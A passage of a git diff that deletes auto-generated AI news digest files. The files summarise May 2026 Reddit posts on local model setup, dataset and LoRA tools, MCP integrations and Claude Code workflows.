[For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)](https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031 - ---- - -## [IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)](https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: developer_tool, tool_update - -> Hey everyone! A while ago, I shared v3 of my dataset manager. Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down "hallucinated" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️… - ---- - -## [I am getting this error with adetailer on forge neo. The extension was working a week or two ago, but now it is not](https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 0.90 -Tags: developer_tool, tool_update - -> Error running postprocess_image: D:\Programs\sd-webui-forge-neo\extensions\adetailer\scripts\!adetailer.py Traceback (most recent call last): File "D:\Programs\sd-webui-forge-neo\modules\scripts.py", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File "D:\Programs\sd-webui-forge-neo\extensions\adetailer\aaaaaa\traceback.py", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please. - ---- - -## [OpenAI launches new voice intelligence features in its API](https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/) -*TechCrunch AI* | Score: 0.86 -Tags: api_update, product_launch - ---- - -## [Anyone else using LTX locally on Mac via Draw Things? Here’s a WWII-style short I made.](https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: product_launch - -> Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally? - ---- - -## [ds4 webui](https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: open_source - -> Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. * github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video! - ---- - -## [I'm disappointed](https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/) -*Reddit r/ClaudeAI* | 09/05/2026 | Score: 1.00 -Tags: api_update - -> I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution." - ---- - -## [What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. (I'm a noob, and I need some help understanding a few th…](https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: cli_tool - -> **Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the "Main Question" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the "Draw Things" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s… - ---- - -## [Should we use a non-thinking model for code after using a thinking one for plan? (Agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/) -*Reddit r/LocalLLaMA* | 09/05/2026 | Score: 1.00 -Tags: agent_tool - -> I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated. - ---- - -## [TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis](https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: developer_tool - -> # MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. [Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player) - ---- - -## [HiDream-O1-Image Internal Prompt](https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/) -*Reddit r/StableDiffusion* | 09/05/2026 | Score: 1.00 -Tags: developer_tool - -> for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su… - ---- - diff --git a/data/digest-2026-05-10.md b/data/digest-2026-05-10.md deleted file mode 100644 index 122d7c1..0000000 --- a/data/digest-2026-05-10.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-10** | 15 stories | Auto-generated from 320 archived stories - ---- - -## [A MCP universal integration layer Cli tool. It connects to other AI tools to a shared context, task, and memory bus](https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: mcp, cli_tool, tool_update - -> The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in? - ---- - -## [we stopped paying $6-10 per coding session by fixing how my AI reads my codebase](https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c… - ---- - -## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a… - ---- - -## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/) -*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a… - ---- - -## [Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs](https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> One thing Claude Code can't do natively is watch a video. For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player - ---- - -## [Speeding up local LLM for usable coding agent](https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> **TL;DR: Qwen 3.6 35B-A3B** (Q4\_K\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM "apocalypse" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple "Hi" prompt. However, if you've used coding agents before… - ---- - -## [Parax v0.7: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/) -*Reddit r/MachineLearning* | 10/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Hi everyone! Parax is a library for "Parametric modeling" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! Cheers, Gary - ---- - -## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/) -*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 -Tags: open_source - -> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… - ---- - -## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: open_source - -> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… - ---- - -## [I built a site to create free AI videos using LTX 2.3 running on my own GPUs](https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/) -*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 -Tags: open_source - -> Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b… - ---- - -## [Claude just hallucinated again and changed the whole workflow of my app. Do not run them autonomously 24/7.](https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: agent_tool - -> With Claude Max plan, you'd think you're sorted but you're not. It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously. - ---- - -## [My workflow: GPT for architecture and Claude Code for execution](https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: agent_tool - -> I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe… - ---- - -## [Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?](https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/) -*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 -Tags: cli_tool - -> I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\_demo\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D - ---- - -## [Weekend project: behaviour trees for LLM agents](https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: cli_tool - -> Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin… - ---- - -## [I made Claude Code aware of its own usage limits](https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/) -*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 -Tags: api_update - -> Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\`anthropic-ratelimit-unified-5h-utilization\`, \`anthropic-ratelimit-unified-7d-utilization\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \`api.anthropic.com\`. Claude Code already respects \`ANTHROPIC\_BASE\_URL\`, so setting that to \`http://127.0.0.1:4080\` routes all traffic through the proxy. It intercepts the response headers and writes a one-line status file to \`\~/.claude/usage-status.md\`: \`\`\` 5h=9% 7d=99%! overage=0% bottleneck=seven\_day (10/05/2026, 16:19:04) \`\`\` Claude can then read that file on demand, or you can inject it automatically via a \`UserPromptSubmit\` hook so it's present in every prompt. Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil… - ---- - diff --git a/data/digest-2026-05-11.md b/data/digest-2026-05-11.md deleted file mode 100644 index 0064e08..0000000 --- a/data/digest-2026-05-11.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-11** | 15 stories | Auto-generated from 572 archived stories - ---- - -## [Orc (working name) - auditable and declarative AI workflow](https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool - -> **I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \- agents \- models/providers \- tools \- schemas \- inputs \- ordered execution steps \- validation rules \- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod… - ---- - -## [My pre-coding routine with Claude Code, 5 MCP servers before I write a single line](https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, mcp, developer_tool - -> Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. Load Context7 for library doc… - ---- - -## [Dunetrace: Real-time monitoring of your production agents](https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/) -*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 -Tags: api_update, open_source, tool_update - -> I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. **GitHub repo:** [https://github.com/dun… - ---- - -## [I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls](https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is "just use JSON mode" or… - ---- - -## [What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a 